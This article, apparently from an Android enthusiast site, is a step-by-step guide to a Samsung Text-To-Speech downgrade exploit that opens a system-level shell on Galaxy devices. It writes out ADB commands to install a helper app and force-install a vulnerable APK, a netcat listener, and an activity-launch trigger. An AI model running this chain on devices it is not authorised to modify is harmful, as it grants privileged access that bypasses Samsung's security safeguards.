It is known that on the first Monday of every month, Google releases the Android Security Bulletin which contains information on the security vulnerabilities that have been found and mitigated across various components of the Android OS, including the Linux kernel. Large OEMs like Samsung have their own take on Android, so they roll out their own patches and updates in addition to the ones provided by Google.

However, it is not always easy to cover all the loopholes and vulnerabilities. Sometimes, it is possible to create an exploit chain using a previously known vulnerability, when a new method is found to bypass one of the safeguards. This is what XDA Senior Member K0mraid3 did with a four-year-old vulnerability which allows him to gain system shell access on every Samsung Galaxy device including the latest flagship models. This is not the same as having root privileges but it is a high local privilege escalation.

The vulnerability is primarily found in Samsung Text-To-Speech (package name: com. Samsung. SMT), a preloaded system app that is present on all Samsung Galaxy devices. The exploit involves downgrading the installed version of the app to a specific vulnerable build (v3.0.02.2) and then forcing it to load a library that opens a shell with system privilege (UID 1000).

For more information on the exploit, you can refer to the XDA Lead Technical Editor Adam Conway’s article which provides a detailed explanation of how the exploit works and how it was discovered by K0mraid3.

The proof of concept developed by K0mraid3 requires access to the system shell, which while not equivalent to root access, still allows for the execution of many restricted binaries. However, the process also requires the use of a helper application, and must be run at least once before the exploit can be launched. Additionally, users may encounter issues with Samsung’s custom Android skin, One UI, as its built-in power saving features can disrupt communication between the necessary apps. To prevent this, it is recommended to set the power saving profile to “Unrestricted” for the relevant apps prior to attempting the exploit.

To use the exploit developed by K0mraid3, the following steps must be completed:

1. Obtain the pre-compiled version of the exploit from  GitHub repository provided. 
2. Extract the files from the archive, including the vulnerable version of Samsung’s Text-To-Speech APK, a helper application, and a Windows executable.
3. Ensure that the most recent version of ADB is installed on your device and, if using Windows, that the Samsung USB drivers are up-to-date.

How to gain system shell access on any Samsung Galaxy device

Automated Procedure

To simplify the process, K0mraid3 has created a user-friendly GUI application that automates most of the steps. Please note that the GUI app is only available for Windows, so if you use Linux/macOS it is better to follow the manual method

1. Connect the targeted Samsung Galaxy device to your PC, with USB debugging enabled, ensure that it is visible to ADB, and install the helper application

adb install Komraid3s_POC_Vx.x.apk

As previously stated, launch the helper app at least once before moving on to the next step

2. With the targeted device visible to ADB, execute the systemshell-vx.x.exe on the host computer

3. Press the “START SHELL” button, the application will automatically downgrade the Samsung TTS app and attempt to open the system shell.

• You might encounter a prompt on your phone/tablet from the TTS app asking you to download voice data, however, there is no need to engage with these options as they are not related to the exploit
• If the application hangs or fails to open the shell window after some time, close it, restart the targeted Samsung Galaxy device and begin again
• The Galaxy Store application can automatically update and/or reset the power-saving profile of the TTS app in the background, so ensure to verify it before restarting the process

Manual Procedure

1. To gain access to the system shell on a Samsung Galaxy device, connect the device to a PC with USB debugging enabled, ensure that it is visible to ADB, and install the necessary helper application

adb install Komraid3s_POC_Vx.x.apk

• Make sure to launch the helper application at least once before proceeding to the next step, as          previously mentioned

2. To exploit the vulnerability, transfer the compromised version of the Samsung TTS app to the /data/local/tmp directory and adjust its permissions accordingly.

adb push samsungTTSVULN2.apk /data/local/tmp

adb shell chmod 777 /data/local/tmp/samsungTTSVULN2.apk

3. Now reboot the device. After rebooting the device, as soon as the home screen appears, execute a command to substitute the installed version of the Samsung TTS app with the vulnerable version

adb shell pm install -r -d -f -g –full –install-reason 3 –enable-rollback /data/local/tmp/samsungTTSVULN2.apk

• If the process is successful, a “Success” message will be displayed on the console.

4. To open a shell on the targeted device, open a new terminal window and use the adb shell command, then run the Netcat binary and wait for an incoming connection on port 9997 by using the following command

adb shell nc -lp 9997

5. At this point, to open the system shell, we need to activate a specific function of the Samsung TTS app

• To create a shortcut for the “com.samsung.SMT/.gui.DownloadList” activity, utilize a third-party application like this
• Instead of using a third-party app, you can also use Android’s activity manager (am) to achieve the same result. By using ADB (adb shell am start -n com.samsung.SMT/.gui.DownloadList) or a terminal emulator app such as Termux, you can execute the command on your phone or tablet.

am start -n com.samsung.SMT/.gui.DownloadList

6. Return to the initial shell, and you will observe a new command prompt with system level privilege (UID 1000

Verification

Once you have access to the shell, you can verify your privilege level by using one of the following commands

whoami

• The output should indicate “system” privilege level

id -u

• The output should indicate a UID of “1000”